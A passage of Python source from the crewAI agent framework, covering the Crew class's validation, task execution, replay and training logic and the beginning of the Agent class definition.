aggregate_raw_outputs_from_task_outputs, aggregate_raw_outputs_from_tasks, ) from crewai.utilities.planning_handler import CrewPlanner from crewai.utilities.task_output_storage_handler import TaskOutputStorageHandler from crewai.utilities.training_handler import CrewTrainingHandler agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: import agentops # type: ignore except ImportError: pass if TYPE_CHECKING: from crewai.pipeline.pipeline import Pipeline class Crew(BaseModel): """ Represents a group of agents, defining how they should collaborate and the tasks they should perform. Attributes: tasks: List of tasks assigned to the crew. agents: List of agents part of this crew. manager_llm: The language model that will run manager agent. manager_agent: Custom agent that will be used as manager. memory: Whether the crew should use memory to store memories of it's execution. manager_callbacks: The callback handlers to be executed by the manager agent when hierarchical process is used cache: Whether the crew should use a cache to store the results of the tools execution. function_calling_llm: The language model that will run the tool calling for all the agents. process: The process flow that the crew will follow (e.g., sequential, hierarchical). verbose: Indicates the verbosity level for logging during execution. config: Configuration settings for the crew. max_rpm: Maximum number of requests per minute for the crew execution to be respected. prompt_file: Path to the prompt json file to be used for the crew. id: A unique identifier for the crew instance. task_callback: Callback to be executed after each task for every agents execution. step_callback: Callback to be executed after each step for every agents execution. share_crew: Whether you want to share the complete crew information and execution with crewAI to make the library better, and allow us to train models. planning: Plan the crew execution and add the plan to the crew. 
""" __hash__ = object.__hash__ # type: ignore _execution_span: Any = PrivateAttr() _rpm_controller: RPMController = PrivateAttr() _logger: Logger = PrivateAttr() _file_handler: FileHandler = PrivateAttr() _cache_handler: InstanceOf[CacheHandler] = PrivateAttr(default=CacheHandler()) _short_term_memory: Optional[InstanceOf[ShortTermMemory]] = PrivateAttr() _long_term_memory: Optional[InstanceOf[LongTermMemory]] = PrivateAttr() _entity_memory: Optional[InstanceOf[EntityMemory]] = PrivateAttr() _train: Optional[bool] = PrivateAttr(default=False) _train_iteration: Optional[int] = PrivateAttr() _inputs: Optional[Dict[str, Any]] = PrivateAttr(default=None) _logging_color: str = PrivateAttr( default="bold_purple", ) _task_output_handler: TaskOutputStorageHandler = PrivateAttr( default_factory=TaskOutputStorageHandler ) name: Optional[str] = Field(default=None) cache: bool = Field(default=True) tasks: List[Task] = Field(default_factory=list) agents: List[BaseAgent] = Field(default_factory=list) process: Process = Field(default=Process.sequential) verbose: bool = Field(default=False) memory: bool = Field( default=False, description="Whether the crew should use memory to store memories of it's execution", ) embedder: Optional[dict] = Field( default={"provider": "openai"}, description="Configuration for the embedder to be used for the crew.", ) usage_metrics: Optional[UsageMetrics] = Field( default=None, description="Metrics for the LLM usage during all tasks execution.", ) manager_llm: Optional[Any] = Field( description="Language model that will run the agent.", default=None ) manager_agent: Optional[BaseAgent] = Field( description="Custom agent that will be used as manager.", default=None ) manager_callbacks: Optional[List[InstanceOf[BaseCallbackHandler]]] = Field( default=None, description="A list of callback handlers to be executed by the manager agent when hierarchical process is used", ) function_calling_llm: Optional[Any] = Field( description="Language model that will run the agent.", default=None ) config: Optional[Union[Json, Dict[str, Any]]] = Field(default=None) id: UUID4 = Field(default_factory=uuid.uuid4, frozen=True) share_crew: Optional[bool] = Field(default=False) step_callback: Optional[Any] = Field( default=None, description="Callback to be executed after each step for all agents execution.", ) task_callback: Optional[Any] = Field( default=None, description="Callback to be executed after each task for all agents execution.", ) max_rpm: Optional[int] = Field( default=None, description="Maximum number of requests per minute for the crew execution to be respected.", ) prompt_file: str = Field( default=None, description="Path to the prompt json file to be used for the crew.", ) output_log_file: Optional[str] = Field( default=None, description="output_log_file", ) planning: Optional[bool] = Field( default=False, description="Plan the crew execution and add the plan to the crew.", ) planning_llm: Optional[Any] = Field( default=None, description="Language model that will run the AgentPlanner if planning is True.", ) task_execution_output_json_files: Optional[List[str]] = Field( default=None, description="List of file paths for task execution JSON files.", ) execution_logs: List[Dict[str, Any]] = Field( default=[], description="List of execution logs for tasks", ) @field_validator("id", mode="before") @classmethod def _deny_user_set_id(cls, v: Optional[UUID4]) -> None: """Prevent manual setting of the 'id' field by users.""" if v: raise PydanticCustomError( "may_not_set_field", "The 'id' 
field cannot be set by the user.", {} ) @field_validator("config", mode="before") @classmethod def check_config_type( cls, v: Union[Json, Dict[str, Any]] ) -> Union[Json, Dict[str, Any]]: """Validates that the config is a valid type. Args: v: The config to be validated. Returns: The config if it is valid. """ # TODO: Improve typing return json.loads(v) if isinstance(v, Json) else v # type: ignore @model_validator(mode="after") def set_private_attrs(self) -> "Crew": """Set private attributes.""" self._cache_handler = CacheHandler() self._logger = Logger(verbose=self.verbose) if self.output_log_file: self._file_handler = FileHandler(self.output_log_file) self._rpm_controller = RPMController(max_rpm=self.max_rpm, logger=self._logger) self._telemetry = Telemetry() self._telemetry.set_tracer() return self @model_validator(mode="after") def create_crew_memory(self) -> "Crew": """Set private attributes.""" if self.memory: self._long_term_memory = LongTermMemory() self._short_term_memory = ShortTermMemory( crew=self, embedder_config=self.embedder ) self._entity_memory = EntityMemory(crew=self, embedder_config=self.embedder) return self @model_validator(mode="after") def check_manager_llm(self): """Validates that the language model is set when using hierarchical process.""" if self.process == Process.hierarchical: if not self.manager_llm and not self.manager_agent: raise PydanticCustomError( "missing_manager_llm_or_manager_agent", "Attribute `manager_llm` or `manager_agent` is required when using hierarchical process.", {}, ) if (self.manager_agent is not None) and ( self.agents.count(self.manager_agent) > 0 ): raise PydanticCustomError( "manager_agent_in_agents", "Manager agent should not be included in agents list.", {}, ) return self @model_validator(mode="after") def check_config(self): """Validates that the crew is properly configured with agents and tasks.""" if not self.config and not self.tasks and not self.agents: raise PydanticCustomError( "missing_keys", "Either 'agents' and 'tasks' need to be set or 'config'.", {}, ) if self.config: self._setup_from_config() if self.agents: for agent in self.agents: if self.cache: agent.set_cache_handler(self._cache_handler) if self.max_rpm: agent.set_rpm_controller(self._rpm_controller) return self @model_validator(mode="after") def validate_tasks(self): if self.process == Process.sequential: for task in self.tasks: if task.agent is None: raise PydanticCustomError( "missing_agent_in_task", f"Sequential process error: Agent is missing in the task with the following description: {task.description}", # type: ignore # Argument of type "str" cannot be assigned to parameter "message_template" of type "LiteralString" {}, ) return self @model_validator(mode="after") def validate_end_with_at_most_one_async_task(self): """Validates that the crew ends with at most one asynchronous task.""" final_async_task_count = 0 # Traverse tasks backward for task in reversed(self.tasks): if task.async_execution: final_async_task_count += 1 else: break # Stop traversing as soon as a non-async task is encountered if final_async_task_count > 1: raise PydanticCustomError( "async_task_count", "The crew must end with at most one asynchronous task.", {}, ) return self @model_validator(mode="after") def validate_first_task(self) -> "Crew": """Ensure the first task is not a ConditionalTask.""" if self.tasks and isinstance(self.tasks[0], ConditionalTask): raise PydanticCustomError( "invalid_first_task", "The first task cannot be a ConditionalTask.", {}, ) return self 
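    # Illustrative sketch of what the validators above and below enforce, assuming
    # agents and tasks built with this library (the names here are hypothetical):
    #
    #     researcher = Agent(role="Researcher", goal="...", backstory="...")
    #     writer = Agent(role="Writer", goal="...", backstory="...")
    #     research = Task(description="Collect notes on X",
    #                     expected_output="Bullet notes", agent=researcher)
    #     summary = Task(description="Summarise the notes",
    #                    expected_output="One paragraph", agent=writer,
    #                    context=[research], async_execution=True)
    #
    #     Crew(agents=[researcher, writer], tasks=[research, summary])
    #         -> OK: sequential process, every task has an agent, and the crew
    #            ends with at most one asynchronous task.
    #     Crew(agents=[researcher, writer], tasks=[research, summary],
    #          process=Process.hierarchical)
    #         -> raises "missing_manager_llm_or_manager_agent": a hierarchical
    #            crew needs either manager_llm or manager_agent.
    #     Crew(agents=[researcher, writer], tasks=[ConditionalTask(...), research])
    #         -> raises "invalid_first_task": the first task cannot be a
    #            ConditionalTask.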
@model_validator(mode="after") def validate_async_tasks_not_async(self) -> "Crew": """Ensure that ConditionalTask is not async.""" for task in self.tasks: if task.async_execution and isinstance(task, ConditionalTask): raise PydanticCustomError( "invalid_async_conditional_task", f"Conditional Task: {task.description} , cannot be executed asynchronously.", # type: ignore # Argument of type "str" cannot be assigned to parameter "message_template" of type "LiteralString" {}, ) return self @model_validator(mode="after") def validate_async_task_cannot_include_sequential_async_tasks_in_context(self): """ Validates that if a task is set to be executed asynchronously, it cannot include other asynchronous tasks in its context unless separated by a synchronous task. """ for i, task in enumerate(self.tasks): if task.async_execution and task.context: for context_task in task.context: if context_task.async_execution: for j in range(i - 1, -1, -1): if self.tasks[j] == context_task: raise ValueError( f"Task '{task.description}' is asynchronous and cannot include other sequential asynchronous tasks in its context." ) if not self.tasks[j].async_execution: break return self @model_validator(mode="after") def validate_context_no_future_tasks(self): """Validates that a task's context does not include future tasks.""" task_indices = {id(task): i for i, task in enumerate(self.tasks)} for task in self.tasks: if task.context: for context_task in task.context: if id(context_task) not in task_indices: continue # Skip context tasks not in the main tasks list if task_indices[id(context_task)] > task_indices[id(task)]: raise ValueError( f"Task '{task.description}' has a context dependency on a future task '{context_task.description}', which is not allowed." ) return self @property def key(self) -> str: source = [agent.key for agent in self.agents] + [ task.key for task in self.tasks ] return md5("|".join(source).encode(), usedforsecurity=False).hexdigest() def _setup_from_config(self): assert self.config is not None, "Config should not be None." """Initializes agents and tasks from the provided config.""" if not self.config.get("agents") or not self.config.get("tasks"): raise PydanticCustomError( "missing_keys_in_config", "Config should have 'agents' and 'tasks'.", {} ) self.process = self.config.get("process", self.process) self.agents = [Agent(**agent) for agent in self.config["agents"]] self.tasks = [self._create_task(task) for task in self.config["tasks"]] def _create_task(self, task_config: Dict[str, Any]) -> Task: """Creates a task instance from its configuration. Args: task_config: The configuration of the task. Returns: A task instance. 
""" task_agent = next( agt for agt in self.agents if agt.role == task_config["agent"] ) del task_config["agent"] return Task(**task_config, agent=task_agent) def _setup_for_training(self, filename: str) -> None: """Sets up the crew for training.""" self._train = True for task in self.tasks: task.human_input = True for agent in self.agents: agent.allow_delegation = False CrewTrainingHandler(TRAINING_DATA_FILE).initialize_file() CrewTrainingHandler(filename).initialize_file() def train( self, n_iterations: int, filename: str, inputs: Optional[Dict[str, Any]] = {} ) -> None: """Trains the crew for a given number of iterations.""" self._setup_for_training(filename) for n_iteration in range(n_iterations): self._train_iteration = n_iteration self.kickoff(inputs=inputs) training_data = CrewTrainingHandler(TRAINING_DATA_FILE).load() for agent in self.agents: result = TaskEvaluator(agent).evaluate_training_data( training_data=training_data, agent_id=str(agent.id) ) CrewTrainingHandler(filename).save_trained_data( agent_id=str(agent.role), trained_data=result.model_dump() ) def kickoff( self, inputs: Optional[Dict[str, Any]] = None, ) -> CrewOutput: """Starts the crew to work on its assigned tasks.""" self._execution_span = self._telemetry.crew_execution_span(self, inputs) self._task_output_handler.reset() self._logging_color = "bold_purple" if inputs is not None: self._inputs = inputs self._interpolate_inputs(inputs) self._set_tasks_callbacks() i18n = I18N(prompt_file=self.prompt_file) for agent in self.agents: agent.i18n = i18n # type: ignore[attr-defined] # Argument 1 to "_interpolate_inputs" of "Crew" has incompatible type "dict[str, Any] | None"; expected "dict[str, Any]" agent.crew = self # type: ignore[attr-defined] # TODO: Create an AgentFunctionCalling protocol for future refactoring if not agent.function_calling_llm: # type: ignore # "BaseAgent" has no attribute "function_calling_llm" agent.function_calling_llm = self.function_calling_llm # type: ignore # "BaseAgent" has no attribute "function_calling_llm" if agent.allow_code_execution: # type: ignore # BaseAgent" has no attribute "allow_code_execution" agent.tools += agent.get_code_execution_tools() # type: ignore # "BaseAgent" has no attribute "get_code_execution_tools"; maybe "get_delegation_tools"? if not agent.step_callback: # type: ignore # "BaseAgent" has no attribute "step_callback" agent.step_callback = self.step_callback # type: ignore # "BaseAgent" has no attribute "step_callback" agent.create_agent_executor() if self.planning: self._handle_crew_planning() metrics: List[UsageMetrics] = [] if self.process == Process.sequential: result = self._run_sequential_process() elif self.process == Process.hierarchical: result = self._run_hierarchical_process() else: raise NotImplementedError( f"The process '{self.process}' is not implemented yet." 
) metrics += [agent._token_process.get_summary() for agent in self.agents] self.usage_metrics = UsageMetrics() for metric in metrics: self.usage_metrics.add_usage_metrics(metric) return result def kickoff_for_each(self, inputs: List[Dict[str, Any]]) -> List[CrewOutput]: """Executes the Crew's workflow for each input in the list and aggregates results.""" results: List[CrewOutput] = [] # Initialize the parent crew's usage metrics total_usage_metrics = UsageMetrics() for input_data in inputs: crew = self.copy() output = crew.kickoff(inputs=input_data) if crew.usage_metrics: total_usage_metrics.add_usage_metrics(crew.usage_metrics) results.append(output) self.usage_metrics = total_usage_metrics self._task_output_handler.reset() return results async def kickoff_async(self, inputs: Optional[Dict[str, Any]] = {}) -> CrewOutput: """Asynchronous kickoff method to start the crew execution.""" return await asyncio.to_thread(self.kickoff, inputs) async def kickoff_for_each_async(self, inputs: List[Dict]) -> List[CrewOutput]: crew_copies = [self.copy() for _ in inputs] async def run_crew(crew, input_data): return await crew.kickoff_async(inputs=input_data) tasks = [ asyncio.create_task(run_crew(crew_copies[i], inputs[i])) for i in range(len(inputs)) ] tasks = [ asyncio.create_task(run_crew(crew_copies[i], inputs[i])) for i in range(len(inputs)) ] results = await asyncio.gather(*tasks) total_usage_metrics = UsageMetrics() for crew in crew_copies: if crew.usage_metrics: total_usage_metrics.add_usage_metrics(crew.usage_metrics) self.usage_metrics = total_usage_metrics self._task_output_handler.reset() return results def _handle_crew_planning(self): """Handles the Crew planning.""" self._logger.log("info", "Planning the crew execution") result = CrewPlanner( tasks=self.tasks, planning_agent_llm=self.planning_llm )._handle_crew_planning() for task, step_plan in zip(self.tasks, result.list_of_plans_per_task): task.description += step_plan.plan def _store_execution_log( self, task: Task, output: TaskOutput, task_index: int, was_replayed: bool = False, ): if self._inputs: inputs = self._inputs else: inputs = {} log = { "task": task, "output": { "description": output.description, "summary": output.summary, "raw": output.raw, "pydantic": output.pydantic, "json_dict": output.json_dict, "output_format": output.output_format, "agent": output.agent, }, "task_index": task_index, "inputs": inputs, "was_replayed": was_replayed, } self._task_output_handler.update(task_index, log) def _run_sequential_process(self) -> CrewOutput: """Executes tasks sequentially and returns the final output.""" return self._execute_tasks(self.tasks) def _run_hierarchical_process(self) -> CrewOutput: """Creates and assigns a manager agent to make sure the crew completes the tasks.""" self._create_manager_agent() return self._execute_tasks(self.tasks) def _create_manager_agent(self): i18n = I18N(prompt_file=self.prompt_file) if self.manager_agent is not None: self.manager_agent.allow_delegation = True manager = self.manager_agent if manager.tools is not None and len(manager.tools) > 0: self._logger.log( "warning", "Manager agent should not have tools", color="orange" ) manager.tools = [] manager.tools = self.manager_agent.get_delegation_tools(self.agents) else: manager = Agent( role=i18n.retrieve("hierarchical_manager_agent", "role"), goal=i18n.retrieve("hierarchical_manager_agent", "goal"), backstory=i18n.retrieve("hierarchical_manager_agent", "backstory"), tools=AgentTools(agents=self.agents).tools(), llm=self.manager_llm, 
verbose=self.verbose, ) self.manager_agent = manager def _execute_tasks( self, tasks: List[Task], start_index: Optional[int] = 0, was_replayed: bool = False, ) -> CrewOutput: """Executes tasks sequentially and returns the final output. Args: tasks (List[Task]): List of tasks to execute manager (Optional[BaseAgent], optional): Manager agent to use for delegation. Defaults to None. Returns: CrewOutput: Final output of the crew """ task_outputs: List[TaskOutput] = [] futures: List[Tuple[Task, Future[TaskOutput], int]] = [] last_sync_output: Optional[TaskOutput] = None for task_index, task in enumerate(tasks): if start_index is not None and task_index < start_index: if task.output: if task.async_execution: task_outputs.append(task.output) else: task_outputs = [task.output] last_sync_output = task.output continue agent_to_use = self._get_agent_to_use(task) if agent_to_use is None: raise ValueError( f"No agent available for task: {task.description}. Ensure that either the task has an assigned agent or a manager agent is provided." ) self._prepare_agent_tools(task) self._log_task_start(task, agent_to_use.role) if isinstance(task, ConditionalTask): skipped_task_output = self._handle_conditional_task( task, task_outputs, futures, task_index, was_replayed ) if skipped_task_output: continue if task.async_execution: context = self._get_context( task, [last_sync_output] if last_sync_output else [] ) future = task.execute_async( agent=agent_to_use, context=context, tools=agent_to_use.tools, ) futures.append((task, future, task_index)) else: if futures: task_outputs = self._process_async_tasks(futures, was_replayed) futures.clear() context = self._get_context(task, task_outputs) task_output = task.execute_sync( agent=agent_to_use, context=context, tools=agent_to_use.tools, ) task_outputs = [task_output] self._process_task_result(task, task_output) self._store_execution_log(task, task_output, task_index, was_replayed) if futures: task_outputs = self._process_async_tasks(futures, was_replayed) return self._create_crew_output(task_outputs) def _handle_conditional_task( self, task: ConditionalTask, task_outputs: List[TaskOutput], futures: List[Tuple[Task, Future[TaskOutput], int]], task_index: int, was_replayed: bool, ) -> Optional[TaskOutput]: if futures: task_outputs = self._process_async_tasks(futures, was_replayed) futures.clear() previous_output = task_outputs[task_index - 1] if task_outputs else None if previous_output is not None and not task.should_execute(previous_output): self._logger.log( "debug", f"Skipping conditional task: {task.description}", color="yellow", ) skipped_task_output = task.get_skipped_task_output() if not was_replayed: self._store_execution_log(task, skipped_task_output, task_index) return skipped_task_output return None def _prepare_agent_tools(self, task: Task): if self.process == Process.hierarchical: if self.manager_agent: self._update_manager_tools(task) else: raise ValueError("Manager agent is required for hierarchical process.") elif task.agent and task.agent.allow_delegation: self._add_delegation_tools(task) def _get_agent_to_use(self, task: Task) -> Optional[BaseAgent]: if self.process == Process.hierarchical: return self.manager_agent return task.agent def _add_delegation_tools(self, task: Task): agents_for_delegation = [agent for agent in self.agents if agent != task.agent] if len(self.agents) > 1 and len(agents_for_delegation) > 0 and task.agent: delegation_tools = task.agent.get_delegation_tools(agents_for_delegation) # Add tools if they are not already in task.tools 
for new_tool in delegation_tools: # Find the index of the tool with the same name existing_tool_index = next( ( index for index, tool in enumerate(task.tools or []) if tool.name == new_tool.name ), None, ) if not task.tools: task.tools = [] if existing_tool_index is not None: # Replace the existing tool task.tools[existing_tool_index] = new_tool else: # Add the new tool task.tools.append(new_tool) def _log_task_start(self, task: Task, role: str = "None"): color = self._logging_color self._logger.log("debug", f"== Working Agent: {role}", color=color) self._logger.log("info", f"== Starting Task: {task.description}", color=color) if self.output_log_file: self._file_handler.log(agent=role, task=task.description, status="started") def _update_manager_tools(self, task: Task): if self.manager_agent: if task.agent: self.manager_agent.tools = task.agent.get_delegation_tools([task.agent]) else: self.manager_agent.tools = self.manager_agent.get_delegation_tools( self.agents ) def _get_context(self, task: Task, task_outputs: List[TaskOutput]): context = ( aggregate_raw_outputs_from_tasks(task.context) if task.context else aggregate_raw_outputs_from_task_outputs(task_outputs) ) return context def _process_task_result(self, task: Task, output: TaskOutput) -> None: role = task.agent.role if task.agent is not None else "None" self._logger.log("debug", f"== [{role}] Task output: {output}\n\n") if self.output_log_file: self._file_handler.log(agent=role, task=output, status="completed") def _create_crew_output(self, task_outputs: List[TaskOutput]) -> CrewOutput: if len(task_outputs) != 1: raise ValueError( "Something went wrong. Kickoff should return only one task output." ) final_task_output = task_outputs[0] final_string_output = final_task_output.raw self._finish_execution(final_string_output) token_usage = self.calculate_usage_metrics() return CrewOutput( raw=final_task_output.raw, pydantic=final_task_output.pydantic, json_dict=final_task_output.json_dict, tasks_output=[task.output for task in self.tasks if task.output], token_usage=token_usage, ) def _process_async_tasks( self, futures: List[Tuple[Task, Future[TaskOutput], int]], was_replayed: bool = False, ) -> List[TaskOutput]: task_outputs: List[TaskOutput] = [] for future_task, future, task_index in futures: task_output = future.result() task_outputs.append(task_output) self._process_task_result(future_task, task_output) self._store_execution_log( future_task, task_output, task_index, was_replayed ) return task_outputs def _find_task_index( self, task_id: str, stored_outputs: List[Any] ) -> Optional[int]: return next( ( index for (index, d) in enumerate(stored_outputs) if d["task_id"] == str(task_id) ), None, ) def replay( self, task_id: str, inputs: Optional[Dict[str, Any]] = None ) -> CrewOutput: stored_outputs = self._task_output_handler.load() if not stored_outputs: raise ValueError(f"Task with id {task_id} not found in the crew's tasks.") start_index = self._find_task_index(task_id, stored_outputs) if start_index is None: raise ValueError(f"Task with id {task_id} not found in the crew's tasks.") replay_inputs = ( inputs if inputs is not None else stored_outputs[start_index]["inputs"] ) self._inputs = replay_inputs if replay_inputs: self._interpolate_inputs(replay_inputs) if self.process == Process.hierarchical: self._create_manager_agent() for i in range(start_index): stored_output = stored_outputs[i][ "output" ] # for adding context to the task task_output = TaskOutput( description=stored_output["description"], agent=stored_output["agent"], 
                raw=stored_output["raw"],
                pydantic=stored_output["pydantic"],
                json_dict=stored_output["json_dict"],
                output_format=stored_output["output_format"],
            )
            self.tasks[i].output = task_output

        self._logging_color = "bold_blue"
        result = self._execute_tasks(self.tasks, start_index, True)
        return result

    def copy(self):
        """Create a deep copy of the Crew."""
        exclude = {
            "id",
            "_rpm_controller",
            "_logger",
            "_execution_span",
            "_file_handler",
            "_cache_handler",
            "_short_term_memory",
            "_long_term_memory",
            "_entity_memory",
            "_telemetry",
            "agents",
            "tasks",
        }

        cloned_agents = [agent.copy() for agent in self.agents]
        cloned_tasks = [task.copy(cloned_agents) for task in self.tasks]

        copied_data = self.model_dump(exclude=exclude)
        copied_data = {k: v for k, v in copied_data.items() if v is not None}

        copied_data.pop("agents", None)
        copied_data.pop("tasks", None)

        copied_crew = Crew(**copied_data, agents=cloned_agents, tasks=cloned_tasks)

        return copied_crew

    def _set_tasks_callbacks(self) -> None:
        """Sets callback for every task using task_callback."""
        for task in self.tasks:
            if not task.callback:
                task.callback = self.task_callback

    def _interpolate_inputs(self, inputs: Dict[str, Any]) -> None:
        """Interpolates the inputs in the tasks and agents."""
        [
            task.interpolate_inputs(  # type: ignore # "interpolate_inputs" of "Task" does not return a value (it only ever returns None)
                inputs
            )
            for task in self.tasks
        ]
        # type: ignore # "interpolate_inputs" of "Agent" does not return a value (it only ever returns None)
        for agent in self.agents:
            agent.interpolate_inputs(inputs)

    def _finish_execution(self, final_string_output: str) -> None:
        if self.max_rpm:
            self._rpm_controller.stop_rpm_counter()
        if agentops:
            agentops.end_session(
                end_state="Success",
                end_state_reason="Finished Execution",
            )
        self._telemetry.end_crew(self, final_string_output)

    def calculate_usage_metrics(self) -> UsageMetrics:
        """Calculates and returns the usage metrics."""
        total_usage_metrics = UsageMetrics()

        for agent in self.agents:
            if hasattr(agent, "_token_process"):
                token_sum = agent._token_process.get_summary()
                total_usage_metrics.add_usage_metrics(token_sum)

        if self.manager_agent and hasattr(self.manager_agent, "_token_process"):
            token_sum = self.manager_agent._token_process.get_summary()
            total_usage_metrics.add_usage_metrics(token_sum)

        return total_usage_metrics

    def test(
        self,
        n_iterations: int,
        openai_model_name: str,
        inputs: Optional[Dict[str, Any]] = None,
    ) -> None:
        """Test and evaluate the Crew with the given inputs for n iterations."""
        self._test_execution_span = self._telemetry.test_execution_span(
            self, n_iterations, inputs, openai_model_name
        )
        evaluator = CrewEvaluator(self, openai_model_name)

        for i in range(1, n_iterations + 1):
            evaluator.set_iteration(i)
            self.kickoff(inputs=inputs)

        evaluator.print_crew_evaluation_result()

    def __rshift__(self, other: "Crew") -> "Pipeline":
        """
        Implements the >> operator to add another Crew to an existing Pipeline.
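
        Example (illustrative sketch; ``research_crew``, ``writing_crew`` and
        ``editing_crew`` are hypothetical Crew instances):

            pipeline = research_crew >> writing_crew
            pipeline = pipeline >> editing_crew  # same as research_crew >> writing_crew >> editing_crew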
""" from crewai.pipeline.pipeline import Pipeline if not isinstance(other, Crew): raise TypeError( f"Unsupported operand type for >>: '{type(self).__name__}' and '{type(other).__name__}'" ) return Pipeline(stages=[self, other]) def __repr__(self): return f"Crew(id={self.id}, process={self.process}, number_of_agents={len(self.agents)}, number_of_tasks={len(self.tasks)})" File: src/crewai/agent.py import os from inspect import signature from typing import Any, List, Optional, Tuple from langchain.agents.agent import RunnableAgent from langchain.agents.tools import BaseTool from langchain.agents.tools import tool as LangChainTool from langchain_core.agents import AgentAction from langchain_core.callbacks import BaseCallbackHandler from langchain_openai import ChatOpenAI from pydantic import Field, InstanceOf, PrivateAttr, model_validator from crewai.agents import CacheHandler, CrewAgentExecutor, CrewAgentParser from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.memory.contextual.contextual_memory import ContextualMemory from crewai.tools.agent_tools import AgentTools from crewai.utilities import Converter, Prompts from crewai.utilities.constants import TRAINED_AGENTS_DATA_FILE, TRAINING_DATA_FILE from crewai.utilities.token_counter_callback import TokenCalcHandler from crewai.utilities.training_handler import CrewTrainingHandler def mock_agent_ops_provider(): def track_agent(*args, **kwargs): def noop(f): return f return noop return track_agent agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: import agentops # type: ignore # Name "agentops" already defined on line 21 from agentops import track_agent except ImportError: track_agent = mock_agent_ops_provider() else: track_agent = mock_agent_ops_provider() @track_agent() class Agent(BaseAgent): """Represents an agent in a system. Each agent has a role, a goal, a backstory, and an optional language model (llm). The agent can also have memory, can operate in verbose mode, and can delegate tasks to other agents. Attributes: agent_executor: An instance of the CrewAgentExecutor class. role: The role of the agent. goal: The objective of the agent. backstory: The backstory of the agent. config: Dict representation of agent configuration. llm: The language model that will run the agent. function_calling_llm: The language model that will handle the tool calling for this agent, it overrides the crew function_calling_llm. max_iter: Maximum number of iterations for an agent to execute a task. memory: Whether the agent should have memory or not. max_rpm: Maximum number of requests per minute for the agent execution to be respected. verbose: Whether the agent execution should be in verbose mode. allow_delegation: Whether the agent is allowed to delegate tasks to other agents. tools: Tools at agents disposal step_callback: Callback to be executed after each step of the agent execution. 
        callbacks: A list of callback functions from the langchain library that are triggered during the agent's execution process
    """

    _times_executed: int = PrivateAttr(default=0)
    max_execution_time: Optional[int] = Field(
        default=None,
        description="Maximum execution time for an agent to execute a task",
    )
    agent_ops_agent_name: str = None  # type: ignore # Incompatible types in assignment (expression has type "None", variable has type "str")
    agent_ops_agent_id: str = None  # type: ignore # Incompatible types in assignment (expression has type "None", variable has type "str")
    cache_handler: InstanceOf[CacheHandler] = Field(
        default=None, description="An instance of the CacheHandler class."
    )
    step_callback: Optional[Any] = Field(
        default=None,
        description="Callback to be executed after each step of the agent execution.",
    )
    llm: Any = Field(
        default_factory=lambda: ChatOpenAI(
            model=os.environ.get("OPENAI_MODEL_NAME", "gpt-4o")
        ),
        description="Language model that will run the agent.",
    )
    function_calling_llm: Optional[Any] = Field(
        description="Language model that will handle the tool calling for this agent, overriding the crew's function_calling_llm.",
        default=None,
    )
    callbacks: Optional[List[InstanceOf[BaseCallbackHandler]]] = Field(
        default=None,
        description="Langchain callbacks to be executed during the agent's execution.",
    )
    system_template: Optional[str] = Field(
        default=None, description="System format for the agent."
    )
    prompt_template: Optional[str] = Field(
        default=None, description="Prompt format for the agent."
    )
    response_template: Optional[str] = Field(
        default=None, description="Response format for the agent."
    )
    tools_results: Optional[List[Any]] = Field(
        default=[], description="Results of the tools used by the agent."
    )
    allow_code_execution: Optional[bool] = Field(
        default=False, description="Enable code execution for the agent."
    )
    max_retry_limit: int = Field(
        default=2,
        description="Maximum number of retries for an agent to execute a task when an error occurs.",
    )

    @model_validator(mode="after")
    def post_init_setup(self):
        self.agent_ops_agent_name = self.role

        # Different llms store the model name in different attributes
        model_name = getattr(self.llm, "model_name", None) or getattr(
            self.llm, "deployment_name", None
        )

        if model_name:
            self._setup_llm_callbacks(model_name)

        if not self.agent_executor:
            self._setup_agent_executor()

        return self

    def _setup_llm_callbacks(self, model_name: str):
        token_handler = TokenCalcHandler(model_name, self._token_process)

        if not isinstance(self.llm.callbacks, list):
            self.llm.callbacks = []

        if not any(
            isinstance(handler, TokenCalcHandler) for handler in self.llm.callbacks
        ):
            self.llm.callbacks.append(token_handler)

        if agentops and not any(
            isinstance(handler, agentops.LangchainCallbackHandler)
            for handler in self.llm.callbacks
        ):
            agentops.stop_instrumenting()
            self.llm.callbacks.append(agentops.LangchainCallbackHandler())

    def _setup_agent_executor(self):
        if not self.cache_handler:
            self.cache_handler = CacheHandler()
        self.set_cache_handler(self.cache_handler)

    def execute_task(
        self,
        task: Any,
        context: Optional[str] = None,
        tools: Optional[List[Any]] = None,
    ) -> str:
        """Execute a task with the agent.

        Args:
            task: Task to execute.
            context: Context to execute the task in.
            tools: Tools to use for the task.
Returns: Output of the agent """ if self.tools_handler: self.tools_handler.last_used_tool = {} # type: ignore # Incompatible types in assignment (expression has type "dict[Never, Never]", variable has type "ToolCalling") task_prompt = task.prompt() if context: task_prompt = self.i18n.slice("task_with_context").format( task=task_prompt, context=context ) if self.crew and self.crew.memory: contextual_memory = ContextualMemory( self.crew._short_term_memory, self.crew._long_term_memory, self.crew._entity_memory, ) memory = contextual_memory.build_context_for_task(task, context) if memory.strip() != "": task_prompt += self.i18n.slice("memory").format(memory=memory) tools = tools or self.tools or [] parsed_tools = self._parse_tools(tools) self.create_agent_executor(tools=tools) self.agent_executor.tools = parsed_tools self.agent_executor.task = task self.agent_executor.tools_description = self._render_text_description_and_args( parsed_tools ) self.agent_executor.tools_names = self.__tools_names(parsed_tools) if self.crew and self.crew._train: task_prompt = self._training_handler(task_prompt=task_prompt) else: task_prompt = self._use_trained_data(task_prompt=task_prompt) try: result = self.agent_executor.invoke( { "input": task_prompt, "tool_names": self.agent_executor.tools_names, "tools": self.agent_executor.tools_description, } )["output"] except Exception as e: self._times_executed += 1 if self._times_executed > self.max_retry_limit: raise e result = self.execute_task(task, context, tools) if self.max_rpm and self._rpm_controller: self._rpm_controller.stop_rpm_counter() # If there was any tool in self.tools_results that had result_as_answer # set to True, return the results of the last tool that had # result_as_answer set to True for tool_result in self.tools_results: # type: ignore # Item "None" of "list[Any] | None" has no attribute "__iter__" (not iterable) if tool_result.get("result_as_answer", False): result = tool_result["result"] return result def format_log_to_str( self, intermediate_steps: List[Tuple[AgentAction, str]], observation_prefix: str = "Observation: ", llm_prefix: str = "", ) -> str: """Construct the scratchpad that lets the agent continue its thought process.""" thoughts = "" for action, observation in intermediate_steps: thoughts += action.log thoughts += f"\n{observation_prefix}{observation}\n{llm_prefix}" return thoughts def create_agent_executor(self, tools=None) -> None: """Create an agent executor for the agent. Returns: An instance of the CrewAgentExecutor class. 
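
        Note (summary of the body below): the input/scratchpad mapping, the
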